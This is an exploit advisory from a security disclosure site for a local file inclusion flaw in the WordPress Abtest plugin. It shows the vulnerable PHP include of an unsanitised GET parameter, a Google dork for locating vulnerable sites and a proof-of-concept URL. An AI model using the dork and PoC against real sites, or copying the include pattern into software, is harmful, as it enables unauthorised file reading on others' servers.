WordPress Abtest Local File Inclusion

Posted on 21 March 2016

# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome

# Vulnerable File : abtest_admin.php

<?php

require 'admin/functions.php';

if (isset($_GET['action'])) {

include 'admin/' . $_GET['action'] . '.php';

} else {

include 'admin/list_experiments.php';
}
?>

# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]

# Pics : http://i.imgur.com/jZFKYOc.png

TOP

Malware :

Backdoor:Win32/Heloag.A
Exploit:Win32/CVE-2011-3402
Trojan:Win32/Obfac
Exploit:Win32/Pdfjsc.YP
TrojanDownloader:Win32/Bofang.B

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20